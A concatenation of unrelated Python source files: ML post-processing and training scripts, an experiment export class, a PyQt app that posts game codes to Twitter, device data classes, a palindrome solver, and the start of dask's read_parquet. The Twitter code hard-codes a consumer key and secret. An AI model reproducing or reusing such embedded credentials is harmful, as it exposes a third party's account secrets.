            'sample-1.out': 'ad938662144b559bff344ff266f9d1cc',
        })
|
from ..common.constants import MODEL_DEEPGO, MODEL_DEEPRED, MODEL_GOLABELER, MODEL_XBERT, MODEL_PROTBERT
from .DeepGoPostProcess import DeepGoPostProcess
from .PostProcess import PostProcess
from pathlib import Path
import pandas as pd
import logging
logger = logging.getLogger(__name__)
def get_deepgo_postproces() -> PostProcess:
    """Build a DeepGo post-processor from the bundled GO-terms pickle."""
    terms_path = Path(__file__).parent / "resources" / "terms.pkl"
    terms_df = pd.read_pickle(str(terms_path))
    return DeepGoPostProcess(terms_df)
# Model-name -> post-processor registry, populated eagerly at import time.
# NOTE(review): get_deepgo_postproces() is called once per entry, so the terms
# pickle is loaded twice here -- consider sharing a single instance.
POSTPROCESS = {
    MODEL_DEEPGO: get_deepgo_postproces(),
    MODEL_PROTBERT: get_deepgo_postproces(),
    # etc.
}
def get_postprocess(model_name: str) -> PostProcess:
    """Look up the post-processor for a model, defaulting to plain PostProcess.

    Unknown names are logged as warnings and get a fresh default instance.
    """
    if model_name not in POSTPROCESS:
        logger.warning(f'No model name {model_name} - default post-processor loaded')
        return PostProcess()
    logger.info(f'Loading post-process {POSTPROCESS[model_name]}')
    return POSTPROCESS[model_name]
|
# -*- coding: utf-8 -*-
import logging
import os
import pickle
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
from src.models.train_model import (
train_k_and_radius,
train_knn_grouping,
train_and_save_catboost_ensemble,
)
# Fixed seed passed to model training below so runs are reproducible.
random_state = 123
def main():
    """Train best 3 models found in notebooks with both training data and
    combined training and validation data. Saves pickled models to ./models
    """
    logger = logging.getLogger(__name__)
    logger.info("Training best models")
    logger.info("training k and radius model with training data")
    k_and_radius_model = train_k_and_radius(
        train_data_path=os.path.join("data", "processed", "train.csv"),
        metric="manhattan",
        weights="uniform",
        n_neighbors=3,
        radius=2,
    )
    # Use context managers so the pickle file handles are closed promptly
    # (the original passed unclosed open() results straight to pickle.dump).
    with open(os.path.join("models", "k_and_radius_model.p"), "wb") as model_file:
        pickle.dump(k_and_radius_model, model_file)
    logger.info("training knn grouping model (can only use training data)")
    knn_grouping_model = train_knn_grouping(
        train_data_path=os.path.join("data", "processed", "train.csv"),
        metric="euclidean",
        n_neighbors=2,
        weights="squared_distance",
    )
    with open(os.path.join("models", "knn_grouping_model.p"), "wb") as model_file:
        pickle.dump(knn_grouping_model, model_file)
    logger.info("training catboost ensemble model")
    # Bug fix: the original reassigned `knn_grouping_model` here by mistake;
    # the helper saves the model itself, so just name the return clearly.
    catboost_ensemble_model = train_and_save_catboost_ensemble(
        train_data_path=os.path.join("data", "processed", "train.csv"),
        model_save_path=os.path.join("models", "catboost_ensemble_model_dict.p"),
        random_state=random_state,
    )
if __name__ == "__main__":
    # Configure root logging before any training output is emitted.
    log_fmt = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
    logging.basicConfig(level=logging.INFO, format=log_fmt)
    # not used in this stub but often useful for finding various files
    project_dir = Path(__file__).resolve().parents[2]
    # find .env automagically by walking up directories until it's found, then
    # load up the .env entries as environment variables
    load_dotenv(find_dotenv())
    main()
|
'''
objects to hold experiments
'''
import tkinter as tk
import pandas as pd
from tkinter import filedialog
import time, datetime
import os
# Create a hidden Tk root so the filedialog helpers below can run without an
# empty main window appearing.  (Import-time side effect.)
Tk = tk.Tk()
Tk.withdraw()
class experiment:
    """Container for one experiment: main data, parameters, and optional extras.

    Attributes are accessed directly (``exp.data``, ``exp.params``, ``exp.opt``).
    The original also defined same-named accessor *methods*, but the instance
    attributes set in __init__ shadowed them, leaving the methods unreachable
    and broken; they have been removed.
    """

    def __init__(self, data: pd.DataFrame, params: pd.DataFrame, opt=None):
        '''
        :param data: Dataframe holding main data
        :param params: Dataframe holding parameters
        :param opt: Iterable of Dataframes holding optional data
        Initializes the experiment object
        '''
        self.data = data
        self.data.name = 'data'
        self.params = params
        self.params.name = 'params'
        self.opt = opt

    def to_excel(self, filepath: str = None):
        """
        :param filepath: String of .xlsx file name.
        :return: No return statements
        Save experiment object to a single .xlsx file.
        WARNING: There are size and read/write speed limitations inherent to .xlsx.
        """
        if filepath is None:
            # Ask the user where to save; keep only the chosen file's name.
            filepath = filedialog.asksaveasfile(mode='wb', filetypes=[('Excel Worksheet', '.xlsx')],
                                                defaultextension='.xlsx')
            with filepath as f:
                filepath = f.name
        if filepath[-5:] != '.xlsx':
            filepath = str(filepath + '.xlsx')
        with pd.ExcelWriter(filepath) as writer:
            self.data.to_excel(writer, engine='openpyxl', sheet_name='data')
            self.params.to_excel(writer, engine='openpyxl', sheet_name='params')
            if self.opt is not None:
                for i, frame in enumerate(self.opt):
                    frame.to_excel(writer, engine='openpyxl', sheet_name='opt' + str(i))

    def to_csv(self, parentdir: str = None, dirname: str = None):
        """
        :param parentdir: Parent directory to which to save directory of CSVs.
        :param dirname: Name of directory of CSVs.
        :return: No return statements
        Creates a new directory in the selected directory
        """
        if parentdir is None:
            parentdir = filedialog.askdirectory(title='Select the Parent Directory')
        if dirname is None:
            ts = time.time()
            # NOTE(review): this timestamp contains ':' characters, which are
            # not legal in Windows directory names -- confirm target platform.
            dirname = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
        os.mkdir(parentdir + '/' + dirname)
        self.data.to_csv(parentdir + '/' + dirname + '/data.csv')
        self.params.to_csv(parentdir + '/' + dirname + '/params.csv')
        if self.opt is not None:
            for i, frame in enumerate(self.opt):
                frame.to_csv(parentdir + '/' + dirname + '/opt' + str(i) + '.csv')
|
#!python3.5
import sys
from os import getenv, path
from PyQt5 import QtWidgets, QtGui
import webbrowser
import urllib.parse as parseurl
import six.moves
# import httplib2
# import urllib3
import pyperclip
import pickle
#import oauth2
import tweepy
#import twitter
# Custom Packages
import GlyphGrabber
# UI Import
from design import Ui_MainWindow
from dialog import Ui_Dialog
from confirm import Ui_Dialog as Ui_Dialog2
sys.path.insert(0, 'pkgs')
# SCRIPTS
class Window(Ui_MainWindow):
    """Main application window.

    Manages the PC/PS4/XB1 glyph-code files (via GlyphGrabber) and can
    optionally post giveaway codes to Twitter through a tweepy OAuth
    connection.
    """

    def __init__(self, dialog):
        Ui_MainWindow.__init__(self)
        self.setupUi(dialog)
        scriptDir = path.dirname(path.realpath('__file__'))
        dialog.setWindowIcon(QtGui.QIcon(scriptDir + path.sep + 'images/gcg.png'))
        self.status.setText('Welcome to your all in one Glyph Manager!')
        # Keys 0/1/2 hold the PC/PS4/XB1 code-file paths; the two OAuth
        # keys hold the user's stored Twitter tokens.
        self.init_dict = {0: '', 1: '', 2: '', 'oauth_token': '', 'oauth_token_secret': ''}
        # NORMAL FUNCTIONS
        # Twitter blanks
        self.access_token = {'oauth_token': '', 'oauth_token_secret': ''}
        self.twee = tweepy.API()
        self.api = tweepy.api
        # Bug fix: default the path attributes up front so the
        # GlyphGrabber constructions below cannot raise AttributeError
        # when no config file exists yet (previously they were only
        # assigned inside the successful-load branch).
        self.pcPath = ''
        self.psPath = ''
        self.xbPath = ''
        try:
            with open('bin/config.init', 'rb') as inConfig:
                self.init_dict = pickle.load(inConfig)
            if self.init_dict is not None:
                try:
                    self.pcPath = self.init_dict[0]
                    self.psPath = self.init_dict[1]
                    self.xbPath = self.init_dict[2]
                    # Bug fix: these two lines used to self-assign from
                    # self.access_token instead of loading the saved
                    # tokens out of init_dict.
                    self.access_token['oauth_token'] = self.init_dict['oauth_token']
                    self.access_token['oauth_token_secret'] = self.init_dict['oauth_token_secret']
                except (IndexError, KeyError):
                    print('A line was not found')
        except FileNotFoundError:
            print('No Config File! Creating one now...')
            self.config()
        self.ggpc = GlyphGrabber.GlyphGrabber(self.pcPath)
        self.ggps4 = GlyphGrabber.GlyphGrabber(self.psPath)
        self.ggxb1 = GlyphGrabber.GlyphGrabber(self.xbPath)
        self.read_config_data()
        # FOR TWITTER: only offer "connect" when no token is stored yet.
        # Bug fix: this used the identity test `is ''` (unreliable and a
        # SyntaxWarning on modern Python); use equality instead.
        if self.init_dict['oauth_token'] == '':
            self.actionTwitter.setEnabled(True)
            self.twitter_post.setEnabled(False)
        else:
            self.twitter_connect()
        self.init_ui()

    def init_ui(self):
        """Populate the path fields and wire up all widget signals."""
        self.inputPC.setText(self.pcPath)
        self.inputPS4.setText(self.psPath)
        self.inputXB1.setText(self.xbPath)
        # Widget Function Linking
        self.buttonPC.clicked.connect(self.pc_bbutton)
        self.buttonPS4.clicked.connect(self.ps4_bbutton)
        self.buttonXB1.clicked.connect(self.xb1_bbutton)
        self.button1.clicked.connect(self.pc_gbutton)
        self.button2.clicked.connect(self.ps4_gbutton)
        self.button3.clicked.connect(self.xb1_gbutton)
        # Other Things
        self.num_codes.valueChanged.connect(self.slider_change)
        # Menu Actions
        self.actionDocumentation.triggered.connect(self.documentation)
        self.actionTwitter.triggered.connect(self.twitter_connect)
        self.actionReset.triggered.connect(self.reconfig)
        # Twitter portion
        self.twitter_post.clicked.connect(self.twitter_giveaway)

    def twitter_giveaway(self):
        """Compose and post a giveaway tweet containing codes for each
        checked platform, after a user confirmation dialog."""
        tweet = ""
        confirm = self.confirm_send()
        code_length = 19  # assumes each glyph code line is 19 chars - TODO confirm
        num_codes = 0
        labels = 0
        if self.post_pc.isChecked():
            num_codes = num_codes + 1
            labels = labels + 3   # length of '\nPC:' label prefix
        if self.post_ps4.isChecked():
            num_codes = num_codes + 1
            labels = labels + 4   # length of '\nPS4:' label prefix
        if self.post_xb1.isChecked():
            num_codes = num_codes + 1
            labels = labels + 4   # length of '\nXB1:' label prefix
        # Worst-case tweet length, computed before pulling any codes.
        can_you_post = labels + num_codes * (code_length * self.num_codes.value())
        if can_you_post < 280:
            if confirm is True:
                try:
                    if self.post_pc.isChecked():
                        tweet = tweet + '\nPC:' + self.ggpc.get_codes2(self.num_codes.value())
                    # Bug fix: PS4 and XB1 previously pulled their codes
                    # from the PC grabber (self.ggpc).
                    if self.post_ps4.isChecked():
                        tweet = tweet + '\nPS4:' + self.ggps4.get_codes2(self.num_codes.value())
                    if self.post_xb1.isChecked():
                        tweet = tweet + '\nXB1:' + self.ggxb1.get_codes2(self.num_codes.value())
                    if len(tweet) <= 280:
                        print(tweet)
                        self.api.update_status(status=tweet)
                        self.status.setText('Posted to Twitter!')
                    else:
                        print('Your pending tweet is over 280 characters')
                except tweepy.TweepError:
                    print('You aren\'t posting anything...')
                except TypeError:
                    print('Bad format. Please make sure you have one glyph code per line!')
        else:
            print('Your pending tweet is over 280 characters')

    def twitter_connect(self):
        """Connect to the user's Twitter account, running the OAuth
        dance first when no token has been stored yet."""
        # SECURITY NOTE(review): app credentials are hard-coded and ship
        # with the source; consider loading them from a config file.
        consumer_api = "0IxvGU3ZW5ui4WOOSns1aBCYf"
        consumer_secret = "T2YUYViTBCUPWkmtVBLSvm15BTF6H4Pd9gvvr4PihSuJKV88Ub"
        # Bug fix: the string comparisons below used `is` / `is not`.
        if self.init_dict['oauth_token'] == '':
            self.oauth_req(consumer_api, consumer_secret)
        try:
            auth = tweepy.OAuthHandler(consumer_api, consumer_secret)
            auth.set_access_token(self.access_token['oauth_token'],
                                  self.access_token['oauth_token_secret'])
            self.api = tweepy.API(auth)
            if self.init_dict['oauth_token'] != '':
                client_token = self.access_token['oauth_token']
                client_secret = self.access_token['oauth_token_secret']
                auth = tweepy.OAuthHandler(consumer_api, consumer_secret)
                auth.set_access_token(client_token, client_secret)
                self.twee = tweepy.API(auth)
                # Connected to users twitter
                self.init_dict['oauth_token'] = client_token
                self.init_dict['oauth_token_secret'] = client_secret
                self.config()
                print('Connected to ' + self.api.me().name + '\'s Twitter account!')
                self.actionTwitter.setEnabled(False)
                self.twitter_post.setEnabled(True)
            else:
                print('issue retrieving OAuth')
        except (KeyError, tweepy.TweepError):
            print('Twitter Connection Failed.')

    def oauth_req(self, consumer_api, consumer_secret, http_method="GET"):
        """Run the three-step OAuth flow and store the access token in
        both ``access_token`` and ``init_dict`` (then persist it)."""
        # 1
        print('1: Connecting to Consumer')
        auth = tweepy.OAuthHandler(consumer_api, consumer_secret)
        print('\tAbout to pull data.')
        try:
            redirect_url = auth.get_authorization_url()
            print('\tpulled url.')
        except tweepy.TweepError:
            print('Error! Failed to oauth.')
            # Bug fix: without this return, redirect_url below would be
            # unbound and raise NameError.
            return
        # 2
        print('2 Retrieving Client Info')
        webbrowser.open(redirect_url, new=2)
        verifier = self.doit()
        # 3
        print('3: Connecting to client\'s account')
        if len(verifier) == 7:
            try:
                auth.get_access_token(verifier)
                self.access_token['oauth_token'] = auth.access_token
                self.access_token['oauth_token_secret'] = auth.access_token_secret
                self.init_dict['oauth_token'] = auth.access_token
                self.init_dict['oauth_token_secret'] = auth.access_token_secret
                self.config()
            except tweepy.TweepError:
                print('Error! Failed to get access token.')
        else:
            print('Twitter connection failed.')

    def doit(self):
        """Prompt the user for the 7-character OAuth verifier code."""
        print("Opening a new popup window...")
        dialog = QtWidgets.QDialog()
        self.pop = PopUpMessage(dialog, "What is the Confirmation code?")
        self.pop.pushButton.clicked.connect(lambda: self.length_check_7(dialog))
        dialog.exec_()
        dialog.show()
        dialog.close()
        return self.pop.lineEdit.text()

    def confirm_send(self):
        """Ask the user to confirm the giveaway; returns True, False, or
        None when the dialog was dismissed without an answer."""
        print("Opening a new popup window...")
        dialog = QtWidgets.QDialog()
        self.pop = ConfirmMessage(dialog, "Are you sure you want to give away codes on Twitter?!?")
        yes_button = QtWidgets.QDialogButtonBox.Yes
        cancel_button = QtWidgets.QDialogButtonBox.Cancel
        self.pop.buttonBox.button(yes_button).clicked.connect(lambda: self.conf(True, dialog, self.pop))
        self.pop.buttonBox.button(cancel_button).clicked.connect(lambda: self.conf(False, dialog, self.pop))
        dialog.exec_()
        dialog.show()
        dialog.close()
        print(self.pop.getVALUE())
        return self.pop.getVALUE()

    def length_check_7(self, dialog):
        """Accept the dialog only when the entered code is 7 characters."""
        if len(self.pop.lineEdit.text()) == 7:
            dialog.accept()
            dialog.close()
        else:
            print('Your code was not correct')

    def conf(self, val, dialog, pop):
        """Record the user's yes/no answer on ``pop`` and dismiss the dialog."""
        if val is True:
            pop.setVALUE(True)
            dialog.accept()
            dialog.close()
        elif val is False:
            pop.setVALUE(False)
            dialog.reject()
            dialog.close()

    def documentation(self):
        """Open the online documentation in the default browser."""
        webbrowser.open('https://tdefton.stream/gcg/documentation/', new=2)

    def slider_change(self):
        """Mirror the code-count slider value into its companion label."""
        self.num_of_codes.setText(str(self.num_codes.value()))

    def pc_gbutton(self):
        """Grab PC code(s) and show the grabber's status label."""
        self.ggpc.get_codes(self.num_codes.value())
        self.code.setText(self.ggpc.label)
        self.status.setText('PC code(s) copied to your clipboard.')

    def ps4_gbutton(self):
        """Grab PS4 code(s) and show the grabber's status label."""
        self.ggps4.get_codes(self.num_codes.value())
        # Bug fix: the label used to be read from the PC grabber.
        self.code.setText(self.ggps4.label)
        self.status.setText('PS4 code(s) copied to your clipboard.')

    def xb1_gbutton(self):
        """Grab XB1 code(s) and show the grabber's status label."""
        self.ggxb1.get_codes(self.num_codes.value())
        # Bug fix: the label used to be read from the PC grabber.
        self.code.setText(self.ggxb1.label)
        self.status.setText('XB1 code(s) copied to your clipboard.')

    def pc_bbutton(self):
        """Browse for the PC codes file and persist the choice."""
        pathpc = self.browse('PC Codes File...')
        self.inputPC.setText(pathpc)
        self.ggpc.filePath = pathpc
        self.init_dict[0] = pathpc
        self.config()
        self.status.setText('PC code file path added!')

    def ps4_bbutton(self):
        """Browse for the PS4 codes file and persist the choice."""
        pathps4 = self.browse('PS4 Codes File...')
        self.inputPS4.setText(pathps4)
        self.ggps4.filePath = pathps4
        self.init_dict[1] = pathps4
        self.config()
        self.status.setText('PS4 code file path added!')

    def xb1_bbutton(self):
        """Browse for the XB1 codes file and persist the choice."""
        pathxb1 = self.browse('XB1 Codes File...')
        self.inputXB1.setText(pathxb1)
        self.ggxb1.filePath = pathxb1
        self.init_dict[2] = pathxb1
        self.config()
        self.status.setText('XB1 code file path added!')

    # LOGIC
    @staticmethod
    def browse(searchFor):
        """Open a file dialog and return the chosen *.txt/*.csv path."""
        filepath = QtWidgets.QFileDialog.getOpenFileName(None, searchFor, getenv('HOME'), '*.txt *.csv')
        print(filepath[0])
        return filepath[0]

    def config(self):
        """Pickle ``init_dict`` out to bin/config.init."""
        # Init for the Config File
        with open('bin/config.init', 'wb') as outConfig:
            pickle.dump(self.init_dict, outConfig)
        print('Config file updated.')

    def read_config_data(self):
        """Push the loaded config values into the grabbers and tokens."""
        try:
            self.ggpc.filePath = self.init_dict[0]
            self.ggps4.filePath = self.init_dict[1]
            self.ggxb1.filePath = self.init_dict[2]
            self.access_token['oauth_token'] = self.init_dict['oauth_token']
            self.access_token['oauth_token_secret'] = self.init_dict['oauth_token_secret']
            print('Config data loaded.')
        except KeyError:
            # Older/corrupt config: rewrite it with the current defaults.
            self.config()

    def reconfig(self):
        """Reset the UI and the stored configuration to factory state."""
        self.actionTwitter.setEnabled(True)
        self.twitter_post.setEnabled(False)
        self.num_codes.setValue(1)
        self.post_pc.setChecked(False)
        self.post_ps4.setChecked(False)
        self.post_xb1.setChecked(False)
        self.code.setText('-')
        self.init_dict = {0: '', 1: '', 2: '', 'oauth_token': '', 'oauth_token_secret': ''}
        self.ggpc.filePath = ' '
        self.ggps4.filePath = ' '
        self.ggxb1.filePath = ' '
        self.config()
        self.status.setText('GCG wiped clean!')
class PopUpMessage(Ui_Dialog):
    """Simple dialog with a message label and a line-edit for input."""
    # Default label text shown when no message is supplied.
    text = "-"

    def __init__(self, dialog, text=None):
        # Bug fix: this initialised the wrong base class
        # (Ui_MainWindow); PopUpMessage derives from Ui_Dialog.
        Ui_Dialog.__init__(self)
        self.setupUi(dialog)
        self.text = text
        self.init_ui()
        dialog.setWindowTitle("GCG")
        scriptDir = path.dirname(path.realpath('__file__'))
        dialog.setWindowIcon(QtGui.QIcon(scriptDir + path.sep + 'images/gcg.png'))

    def init_ui(self):
        """Apply the supplied message text to the dialog label."""
        if self.text is not None:
            self.label.setText(self.text)
class ConfirmMessage(Ui_Dialog2):
    """Yes/Cancel confirmation dialog; read the answer via getVALUE()."""
    # Default label text shown when no message is supplied.
    text = "-"
    # Last recorded answer: True, False, or None when unanswered.
    __val = None

    def __init__(self, dialog, text=None):
        # Bug fix: this initialised the wrong base class
        # (Ui_MainWindow); ConfirmMessage derives from Ui_Dialog2.
        Ui_Dialog2.__init__(self)
        self.setupUi(dialog)
        self.text = text
        self.init_ui()
        dialog.setWindowTitle("GCG")
        scriptDir = path.dirname(path.realpath('__file__'))
        dialog.setWindowIcon(QtGui.QIcon(scriptDir + path.sep + 'images/gcg.png'))

    def init_ui(self):
        """Apply the supplied message text to the dialog label."""
        if self.text is not None:
            self.label.setText(self.text)

    def getVALUE(self):
        """Return the recorded answer (True/False), or None."""
        return self.__val

    def setVALUE(self, value):
        """Record the answer; anything that is not a bool is ignored."""
        if value is True or value is False:
            self.__val = value
def main():
    """Build the Qt application, show the main window, run the event loop."""
    app = QtWidgets.QApplication(sys.argv)
    root = QtWidgets.QMainWindow()
    window = Window(root)  # noqa: F841 - keep a reference for the app's lifetime
    root.show()
    sys.exit(app.exec_())
__version__ = 1.2  # NOTE(review): a float version loses trailing zeros; a string may be safer
if __name__ == '__main__':
    main()
|
#!/usr/bin/python
"""
Author: Fabio Hellmann <info@fabio-hellmann.de>
"""
from attr import s, ib
from attr.validators import instance_of
from enum import Enum, unique
from datetime import datetime
@unique
class StructPacking(Enum):
    """``struct`` format strings for the device's binary messages.

    The leading ``<`` selects little-endian byte order; ``I`` is an
    unsigned 32-bit int, ``B`` an unsigned byte, ``b`` a signed byte.
    Field meanings below are inferred from the member names - confirm
    against the device protocol.
    """
    PIN = '<I'                 # one unsigned 32-bit value (PIN code)
    BATTERY = '<B'             # one unsigned byte (battery level)
    DATETIME = '<BBBBB'        # five unsigned bytes - presumably date/time components, order TBD
    STATUS = '<BBB'            # three unsigned bytes of status data
    TEMPERATURES = '<bbbbbbb'  # seven signed bytes of temperature data
    LCD_TIMER = '<BB'          # two unsigned bytes
    DAY = '<BBBBBBBB'          # eight unsigned bytes (daily schedule)
    HOLIDAY = '<BBBBBBBBb'     # eight unsigned bytes plus one signed byte
@s(frozen=True)
class Holiday(object):
    """Immutable holiday period with an associated target temperature."""
    start = ib(validator=instance_of(datetime), type=datetime)
    end = ib(validator=instance_of(datetime), type=datetime)
    temperature = ib(validator=instance_of(float), type=float)

    def is_active(self):
        """Return True when start, end and temperature are all set."""
        return all(
            value is not None
            for value in (self.start, self.end, self.temperature)
        )
@s(frozen=True)
class Day(object):
    """Immutable daily time window (semantics inferred from field
    names - presumably a heating schedule entry; confirm)."""
    start = ib(validator=instance_of(datetime), type=datetime)  # window start
    end = ib(validator=instance_of(datetime), type=datetime)    # window end
@s(frozen=True)
class Status(object):
    """Immutable raw device status."""
    state_as_dword = ib(validator=instance_of(str), type=str)  # status bits as a DWORD, held as a string
    unused_bits = ib(validator=instance_of(int), type=int)     # presumably a count of unused bits - TODO confirm
@s(frozen=True)
class Temperature(object):
    """Immutable temperature readings/configuration (units presumably
    degrees Celsius - confirm against the device protocol)."""
    current_temp = ib(validator=instance_of(float), type=float)   # current measured temperature
    manual_temp = ib(validator=instance_of(float), type=float)    # manually-set temperature
    target_temp_l = ib(validator=instance_of(float), type=float)  # target temperature (L) - TODO confirm meaning
    target_temp_h = ib(validator=instance_of(float), type=float)  # target temperature (H) - TODO confirm meaning
    offset_temp = ib(validator=instance_of(float), type=float)    # offset applied to readings
    window_open_detection = ib(validator=instance_of(int), type=int)  # window-open detection setting - TODO confirm
    window_open_minutes = ib(validator=instance_of(int), type=int)    # window-open duration in minutes - TODO confirm
'''
Similar : https://leetcode.com/problems/minimum-insertion-steps-to-make-a-string-palindrome/
'''
class Day34(object):
    """Build the shortest palindrome obtainable by inserting characters
    anywhere into the input string.

    Similar: https://leetcode.com/problems/minimum-insertion-steps-to-make-a-string-palindrome/
    """

    def min_insertions(self, string):
        """Return the shortest palindrome containing ``string``,
        breaking ties lexicographically.

        :type string: str
        :rtype: str

        (Bug fix: the old docstring claimed ``:rtype: int`` and named a
        nonexistent parameter ``s``; the method returns the palindrome
        string itself, not the insertion count.)
        """
        self.string = string
        s_len = len(string)
        # Bug fix: guard the empty string, which previously raised an
        # IndexError from helper(0, -1).
        if s_len == 0:
            return string
        # dp[l][r] caches (insertions_needed, palindrome) for string[l:r+1].
        dp = [[None for _ in range(s_len)] for _ in range(s_len)]

        def helper(left, right):
            # Memo hit: test identity with None (the cached tuples are
            # always truthy, but `is not None` is the safer check).
            if dp[left][right] is not None:
                return dp[left][right]
            sl = self.string[left]
            sr = self.string[right]
            if left == right:
                # Single character: already a palindrome.
                res = (0, sl)
            elif left == right - 1:
                # Two characters: equal -> done; otherwise one insertion,
                # keeping the lexicographically smaller candidate.
                curr_string = self.string[left:right + 1]
                res = (0, curr_string) if sl == sr \
                    else (1, min(curr_string + sl, sr + curr_string))
            else:
                if sl == sr:
                    # Matching ends: solve the interior and wrap it.
                    rec = helper(left + 1, right - 1)
                    res = (rec[0], sl + rec[1] + sl)
                else:
                    # Mismatched ends: insert on whichever side needs
                    # fewer insertions (lexicographic tie-break).
                    l_recur = helper(left + 1, right)
                    r_recur = helper(left, right - 1)
                    lsl = sl + l_recur[1] + sl
                    rsr = sr + r_recur[1] + sr
                    if l_recur[0] < r_recur[0] or (l_recur[0] == r_recur[0] and lsl <= rsr):
                        res = (l_recur[0] + 1, lsl)
                    else:
                        res = (r_recur[0] + 1, rsr)
            dp[left][right] = res
            return res

        return helper(0, s_len - 1)[1]
if __name__ == '__main__':
    day_34 = Day34()
    # (input, expected shortest palindrome) pairs - same checks, same
    # order as the original flat assert list.
    cases = [
        ("zzazz", "zzazz"),
        ("google", "elgoogle"),
        ("race", "ecarace"),
        ("google", "elgoogle"),
        ("racecar", "racecar"),
        ("google", "elgoogle"),
        ("egoogle", "elgoogle"),
        ("elgoog", "elgoogle"),
        ("race", "ecarace"),
    ]
    for text, expected in cases:
        assert day_34.min_insertions(text) == expected
import math
import warnings
import tlz as toolz
from fsspec.core import get_fs_token_paths
from fsspec.implementations.local import LocalFileSystem
from fsspec.utils import stringify_path
from ....base import tokenize
from ....delayed import Delayed
from ....highlevelgraph import HighLevelGraph
from ....layers import DataFrameIOLayer
from ....utils import apply, import_required, natural_sort_key, parse_bytes
from ...core import DataFrame, Scalar, new_dd_object
from ...methods import concat
from .utils import _sort_and_analyze_paths
# Use snappy as the default compression codec only when a usable
# python-snappy is importable; touching `compress` verifies the module
# actually provides the expected API.
try:
    import snappy

    snappy.compress
except (ImportError, AttributeError):
    snappy = None

__all__ = ("read_parquet", "to_parquet")

# Internal label used for an unnamed index column.
NONE_LABEL = "__null_dask_index__"
# ----------------------------------------------------------------------
# User API
class ParquetFunctionWrapper:
    """
    Parquet Function-Wrapper Class

    Callable that reads parquet data from disk to produce one
    partition (given a ``part`` argument).
    """

    def __init__(
        self,
        engine,
        fs,
        meta,
        columns,
        index,
        kwargs,
        common_kwargs,
    ):
        self.engine = engine
        self.fs = fs
        self.meta = meta
        self.columns = columns
        self.index = index
        # User-supplied ``kwargs`` apply identically to every partition,
        # as do the engine-supplied ``common_kwargs``; fold them
        # together once here (user kwargs take precedence).
        self.common_kwargs = toolz.merge(common_kwargs, kwargs or {})

    def project_columns(self, columns):
        """Return an equivalent wrapper restricted to ``columns``
        (or ``self`` when the projection is a no-op)."""
        if columns != self.columns:
            return ParquetFunctionWrapper(
                self.engine,
                self.fs,
                self.meta,
                columns,
                self.index,
                None,  # Already merged into common_kwargs
                self.common_kwargs,
            )
        return self

    def __call__(self, part):
        parts = part if isinstance(part, list) else [part]
        pieces = [(p["piece"], p.get("kwargs", {})) for p in parts]
        return read_parquet_part(
            self.fs,
            self.engine,
            self.meta,
            pieces,
            self.columns,
            self.index,
            self.common_kwargs,
        )
def read_parquet(
    path,
    columns=None,
    filters=None,
    categories=None,
    index=None,
    storage_options=None,
    engine="auto",
    gather_statistics=None,
    split_row_groups=None,
    read_from_paths=None,
    chunksize=None,
    aggregate_files=None,
    **kwargs,
):
    """
    Read a Parquet file into a Dask DataFrame

    This reads a directory of Parquet data into a Dask.dataframe, one file per
    partition. It selects the index among the sorted columns if any exist.

    Parameters
    ----------
    path : str or list
        Source directory for data, or path(s) to individual parquet files.
        Prefix with a protocol like ``s3://`` to read from alternative
        filesystems. To read from multiple files you can pass a globstring or a
        list of paths, with the caveat that they must all have the same
        protocol.
    columns : str or list, default None
        Field name(s) to read in as columns in the output. By default all
        non-index fields will be read (as determined by the pandas parquet
        metadata, if present). Provide a single field name instead of a list to
        read in the data as a Series.
    filters : Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]], default None
        List of filters to apply, like ``[[('col1', '==', 0), ...], ...]``.
        Using this argument will NOT result in row-wise filtering of the final
        partitions unless ``engine="pyarrow-dataset"`` is also specified. For
        other engines, filtering is only performed at the partition level, i.e.,
        to prevent the loading of some row-groups and/or files.

        For the "pyarrow" engines, predicates can be expressed in disjunctive
        normal form (DNF). This means that the innermost tuple describes a single
        column predicate. These inner predicates are combined with an AND
        conjunction into a larger predicate. The outer-most list then combines all
        of the combined filters with an OR disjunction.

        Predicates can also be expressed as a List[Tuple]. These are evaluated
        as an AND conjunction. To express OR in predictates, one must use the
        (preferred for "pyarrow") List[List[Tuple]] notation.

        Note that the "fastparquet" engine does not currently support DNF for
        the filtering of partitioned columns (List[Tuple] is required).
    index : str, list or False, default None
        Field name(s) to use as the output frame index. By default will be
        inferred from the pandas parquet file metadata (if present). Use False
        to read all fields as columns.
    categories : list or dict, default None
        For any fields listed here, if the parquet encoding is Dictionary,
        the column will be created with dtype category. Use only if it is
        guaranteed that the column is encoded as dictionary in all row-groups.
        If a list, assumes up to 2**16-1 labels; if a dict, specify the number
        of labels expected; if None, will load categories automatically for
        data written by dask/fastparquet, not otherwise.
    storage_options : dict, default None
        Key/value pairs to be passed on to the file-system backend, if any.
    engine : str, default 'auto'
        Parquet reader library to use. Options include: 'auto', 'fastparquet',
        'pyarrow', 'pyarrow-dataset', and 'pyarrow-legacy'. Defaults to 'auto',
        which selects the FastParquetEngine if fastparquet is installed (and
        ArrowLegacyEngine otherwise). If 'pyarrow-dataset' is specified, the
        ArrowDatasetEngine (which leverages the pyarrow.dataset API) will be used
        for newer PyArrow versions (>=1.0.0). If 'pyarrow' or 'pyarrow-legacy' are
        specified, the ArrowLegacyEngine will be used (which leverages the
        pyarrow.parquet.ParquetDataset API).
        NOTE: 'pyarrow-dataset' enables row-wise filtering, but requires
        pyarrow>=1.0. The behavior of 'pyarrow' will most likely change to
        ArrowDatasetEngine in a future release, and the 'pyarrow-legacy'
        option will be deprecated once the ParquetDataset API is deprecated.
    gather_statistics : bool, default None
        Gather the statistics for each dataset partition. By default,
        this will only be done if the _metadata file is available. Otherwise,
        statistics will only be gathered if True, because the footer of
        every file will be parsed (which is very slow on some systems).
    split_row_groups : bool or int, default None
        Default is True if a _metadata file is available or if
        the dataset is composed of a single file (otherwise defult is False).
        If True, then each output dataframe partition will correspond to a single
        parquet-file row-group. If False, each partition will correspond to a
        complete file. If a positive integer value is given, each dataframe
        partition will correspond to that number of parquet row-groups (or fewer).
        Only the "pyarrow" engine supports this argument.
    read_from_paths : bool, default None
        Only used by ``ArrowDatasetEngine`` when ``filters`` are specified.
        Determines whether the engine should avoid inserting large pyarrow
        (``ParquetFileFragment``) objects in the task graph. If this option
        is True, ``read_partition`` will need to regenerate the appropriate
        fragment object from the path and row-group IDs. This will reduce the
        size of the task graph, but will add minor overhead to ``read_partition``.
        By default (None), ``ArrowDatasetEngine`` will set this option to
